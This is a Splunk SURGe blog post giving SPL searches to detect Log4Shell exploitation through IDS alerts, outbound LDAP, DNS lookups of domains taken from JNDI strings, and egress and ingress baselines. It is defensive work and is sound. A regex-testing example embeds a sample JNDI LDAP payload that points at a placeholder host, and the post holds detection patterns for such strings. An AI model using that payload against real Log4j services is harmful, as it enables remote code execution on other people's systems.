This blog is a part of Splunk's Log4j response. For additional resources, check out the Log4Shell Overview and Resources for Log4j Vulnerabilities page.
Authors and Contributors: As always, security at Splunk is a family business. Credit to authors and collaborators: Ryan Kovar, Shannon Davis, Johan Bjerke, James Brodsky, Dave Herrald, John Stoner, Drew Church, Mick Baccio, Jay Holladay, Lily Lee, Audra Streetman, Tamara Chacon.
Splunk’s SURGe team provided an initial blog and security advisory for Splunk products in relation to Log4Shell, a Log4j vulnerability that’s been keeping blue teams up at night.
In this blog, we provide additional guidance on how to help detect potential exploitation in your environment. If you haven’t been logging everything needed to detect the initial exploitation, you are still in luck: there are other places to look to find out whether your hosts have been targeted.
The Swiss CERT published a helpful blog containing a diagram that outlines the various stages of this exploit and highlights some key areas to search.
Most of our detections have centered around steps 1 and 2, where the adversary makes the initial JNDI request to the vulnerable server.
What if you aren’t logging that information? Well, phase 3 would be a very good place to start hunting. We can use two key data sources here: Network Traffic and DNS query logs. Let’s take a look at how these two data sources can help us find compromised hosts in our environment.
Don’t forget about your investments in IDS across your environment. Make sure you’ve updated your rules and are indexing the resulting alerts in Splunk. In this case we are using Suricata, but this holds true for any IDS that has deployed signatures for this vulnerability. A quick search against that index will give you a place to start hunting for compromise:
index=suricata ("2021-44228" OR "Log4j" OR "Log4Shell") | table _time, dest_ip, alert.signature, alert.signature_id
Should outbound LDAP traffic be allowed through your perimeter firewall? Probably not. This could be an indication of Log4Shell initial access behavior on your network. Here is a search leveraging tstats and using Splunk best practices with the Network Traffic data model. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.
| tstats earliest(_time) as earliest_time latest(_time) as latest_time values(All_Traffic.dest_ip) from datamodel=Network_Traffic.All_Traffic where (All_Traffic.dest_port = 1389 OR All_Traffic.dest_port = 389 OR All_Traffic.dest_port = 636) AND NOT (All_Traffic.dest_ip = 10.0.0.0/8 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip = 172.16.0.0/12) by All_Traffic.src_ip | convert ctime(earliest_time) ctime(latest_time)
We identified detections for JNDI strings that could indicate attempts to exploit the Log4j vulnerability. How can we correlate this to a successful probe? DNS to the rescue.
The first search uses regular expressions to extract the domains within the JNDI string. It then updates a lookup table containing these domains that we will use in a follow-on search. Keep in mind that this query consumes more CPU cycles than normal because it operates on unstructured data, so it may take a while depending on the amount of data you are searching. When running this search for the first time, you’ll want to comment out the lookup line in the query so that the lookup file gets created first.
index=* jndi
| rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)"
| mvexpand rce_dest
| rex field=rce_dest "(?<rce_ip>\d+\.\d+\.\d+\.\d+)"
| eval rce_domain = case(isnull(rce_ip),rce_dest)
| rex field=rce_domain "(?<top_level_domain>[0-9a-zA-Z\-]+\.[0-9a-zA-Z\-]+$)"
| dedup top_level_domain
| eval top_level_domain = "*.".top_level_domain | where top_level_domain!=""
| lookup log4j_scanning_domain.csv query as top_level_domain OUTPUT query AS old_query
| where isnull(old_query)
| rename top_level_domain as query | table query
| outputlookup append=t log4j_scanning_domain.csv
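Before hunting at scale, you can sanity-check the regular expression against a synthetic event. This is only a test sketch; evil.example.com is a placeholder, not a real indicator:

| makeresults | eval _raw="${jndi:ldap://evil.example.com:1389/Exploit}" | rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" | table proto, rce_dest

If the extraction is working, proto returns ldap and rce_dest returns evil.example.com:1389.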
Once the search above is complete, you will have a lookup table with your domains and can run a tstats search using the Network Resolution data model to find any DNS queries that match the domains from the JNDI probes.
| tstats summariesonly=true allow_old_summaries=true values(host) as host, values(DNS.query_type) as DNS.query_type, values(DNS.reply_code) as DNS.reply_code, values(DNS.transport) as DNS.transport count from datamodel=Network_Resolution.DNS where [| inputlookup log4j_scanning_domain.csv | rename query as DNS.query | format] by DNS.src, sourcetype, DNS.query, index, _time span=1s | stats earliest(_time) as first_seen, latest(_time) as last_seen, sum(count) as count, values(DNS.reply_code) as DNS.reply_code, values(index) as index, values(DNS.src) as DNS.src, values(DNS.query_type) as DNS.query_type, values(DNS.transport) as DNS.transport by host, DNS.query, sourcetype | convert timeformat="%m/%d/%Y %H:%M:%S" ctime(first_seen), ctime(last_seen)
You can also search for outbound (egress) traffic from internal servers that produced no outbound traffic before 2021-12-09. To do this, set the time frame to begin at least 24 hours before 2021-12-09 so the search includes some baseline traffic for comparison. The benefit of this extensive, but slow, behavioural search is that it casts the widest possible net to catch signs of compromise. Here is an SPL search to get you started:
index=* src_ip=* dest_ip=* (NOT (dest_category="internal" OR dest_ip=10.0.0.0/8 OR dest_ip=172.16.0.0/12 OR dest_ip=192.168.0.0/16 OR dest_ip=100.64.0.0/10)) | stats earliest(_time) as earliest latest(_time) as latest values(action) as action values(app) as app values(dest_port) as dest_port values(sourcetype) as sourcetype count by src_ip dest_ip | eventstats max(latest) as maxlatest ```This is 2021-12-09 00:00:00``` | eval comparisonTime="1639008000" ```| eval comparisonTime="-1d@d" ``` | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
The same logic can also be expressed against the Network Traffic data model with tstats, which is faster if the data model is accelerated:
| tstats summariesonly=false allow_old_summaries=true earliest(_time) as earliest latest(_time) as latest values(All_Traffic.action) as action values(All_Traffic.app) as app values(All_Traffic.dest_ip) as dest_ip values(All_Traffic.dest_port) as dest_port values(sourcetype) as sourcetype count from datamodel=Network_Traffic where (NOT (All_Traffic.dest_category="internal" OR All_Traffic.dest_ip=10.0.0.0/8 OR All_Traffic.dest_ip=172.16.0.0/12 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip=100.64.0.0/10)) by All_Traffic.src_ip All_Traffic.dest_ip | rename "All_Traffic.*" as * | eventstats max(latest) as maxlatest ```This is 2021-12-09 00:00:00``` | eval comparisonTime="1639008000" ```| eval comparisonTime="-1d@d" ``` | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
This is a variation of the tstats version of the previous search. It’s been modified to use a baseline of past activity stored in a lookup. The baseline must be populated initially by running the search with a longer time window, and then it can be kept up to date by running the query more frequently (e.g., once hourly). This approach will keep the baseline up to date with the latest activity in your environment.
Note: The first time you run this search, it will result in an error unless the lookup “egress_src_dest_tracker.csv” is configured. You can prevent this by manually creating an empty lookup with that name or by running the search after temporarily removing this line:
| lookup egress_src_dest_tracker.csv dest_ip src_ip OUTPUT earliest AS previous_earliest latest AS previous_latest | tstats summariesonly=false allow_old_summaries=true earliest(_time) as earliest latest(_time) as latest values(All_Traffic.action) as action values(All_Traffic.app) as app values(All_Traffic.dest_ip) as dest_ip values(All_Traffic.dest_port) as dest_port values(sourcetype) as sourcetype count from datamodel=Network_Traffic where (NOT (All_Traffic.dest_category="internal" OR All_Traffic.dest_ip=10.0.0.0/8 OR All_Traffic.dest_ip=172.16.0.0/12 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip=100.64.0.0/10)) by All_Traffic.src_ip All_Traffic.dest_ip | rename "All_Traffic.*" as * | lookup egress_src_dest_tracker.csv dest_ip src_ip OUTPUT earliest AS previous_earliest latest AS previous_latest | eval earliest=min(earliest, previous_earliest), latest=max(latest, previous_latest) | fields - previous_* | appendpipe [ | fields src_ip dest_ip latest earliest | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip | inputlookup append=t egress_src_dest_tracker.csv | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip | outputlookup egress_src_dest_tracker.csv | where a=b ] | eventstats max(latest) as maxlatest | eval comparisonTime="-1h@h" | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
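If you prefer to pre-create the lookup instead of editing the search, a quick way to seed it is shown below. This is a sketch; the 0.0.0.0 row is a dummy placeholder that will never match real internal egress sources:

| makeresults | eval src_ip="0.0.0.0", dest_ip="0.0.0.0", earliest=now(), latest=now() | table src_ip, dest_ip, earliest, latest | outputlookup egress_src_dest_tracker.csv

This writes egress_src_dest_tracker.csv with the columns the lookup command expects, so the search above runs without error on its first execution.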
This technique uses concepts from the previous search. The difference this time is that it looks for external IPs connecting to internal IPs and enriches the external IPs with location information. The lookup baseline is keyed on source, destination, and source country. As with the previous search, it may return many results, some of which may be false positives. You may wish to limit the scope of this search to certain application servers of interest, and you will almost certainly want to exclude desktop systems. The search may be most useful as a hunting query run manually until you are satisfied that it returns useful results.
The baseline must be populated initially by running the search with a longer time window, then it can be kept up to date by running the query more frequently (e.g., once hourly). This approach will keep the baseline up to date with the latest activity in your environment.
Note: The first time you run this search, it will result in an error unless the lookup “ingess_src_dest_country_tracker.csv” is configured. You can prevent this by manually creating an empty lookup with that name or by running the search after temporarily removing this line:
| lookup ingess_src_dest_country_tracker.csv dest_ip src_ip Country OUTPUT earliest AS previous_earliest latest AS previous_latest | tstats summariesonly=false allow_old_summaries=true earliest(_time) as earliest latest(_time) as latest values(All_Traffic.action) as action values(All_Traffic.app) as app values(All_Traffic.dest_ip) as dest_ip values(All_Traffic.dest_port) as dest_port values(sourcetype) as sourcetype count from datamodel=Network_Traffic where (All_Traffic.dest_category="internal" OR All_Traffic.dest_ip=10.0.0.0/8 OR All_Traffic.dest_ip=172.16.0.0/12 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip=100.64.0.0/10) AND (All_Traffic.src_category="external" OR (All_Traffic.src_ip!=10.0.0.0/8 AND All_Traffic.src_ip!=172.16.0.0/12 AND All_Traffic.src_ip!=192.168.0.0/16 AND All_Traffic.src_ip!=100.64.0.0/10)) by All_Traffic.src_ip All_Traffic.dest_ip | rename "All_Traffic.*" as * | iplocation src_ip | lookup ingess_src_dest_country_tracker.csv dest_ip src_ip Country OUTPUT earliest AS previous_earliest latest AS previous_latest | eval earliest=min(earliest, previous_earliest), latest=max(latest, previous_latest) | fields - previous_* | appendpipe [ | fields src_ip dest_ip Country latest earliest | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip, Country | inputlookup append=t ingess_src_dest_country_tracker.csv | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip, Country | outputlookup ingess_src_dest_country_tracker.csv | where a=b ] | eventstats max(latest) as maxlatest | eval comparisonTime="-1h@h" | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
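To limit either baseline search to application servers of interest, one option (the 10.1.2.0/24 subnet is a placeholder for your own server range) is to constrain the internal side of the tstats where clause, for example:

| tstats summariesonly=false allow_old_summaries=true count from datamodel=Network_Traffic where All_Traffic.dest_ip=10.1.2.0/24 by All_Traffic.src_ip, All_Traffic.dest_ip

Merging that All_Traffic.dest_ip condition into the where clauses above keeps the baseline focused on your server subnet and leaves desktop ranges out entirely.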
Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SURGe is monitoring the evolution of this vulnerability and will provide additional information as needed. Additionally, Splunk’s Threat Research Team has been working hard to create some detections for ESCU as well as a SOAR playbook for automated response, which will be released as soon as possible.
SURGe by Splunk is a security research team dedicated to providing expert analysis and insights that help customers discover, investigate, and respond to new and emerging threats. Sign up for SURGe Alerts to receive security research and technical guidance.